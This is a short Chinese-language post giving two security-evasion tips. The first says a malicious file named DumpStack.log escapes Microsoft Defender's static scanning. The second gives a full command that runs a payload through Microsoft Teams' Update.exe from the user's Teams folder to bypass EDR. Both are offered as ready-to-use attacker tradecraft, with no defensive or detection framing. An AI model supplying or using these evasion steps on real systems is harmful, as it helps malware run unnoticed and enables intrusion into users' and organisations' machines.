1、绕过 Defender AV 静态检测： 

如果将恶意文件命名为 DumpStack.log，Defender 不会对其进行扫描。

2、用#MSTeams绕过#EDR 

将有效负载复制到： 

%userprofile%\AppData\Local\Microsoft\Teams\current\ 

然后： 

%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "args" 

使用用户下载并执行二进制文件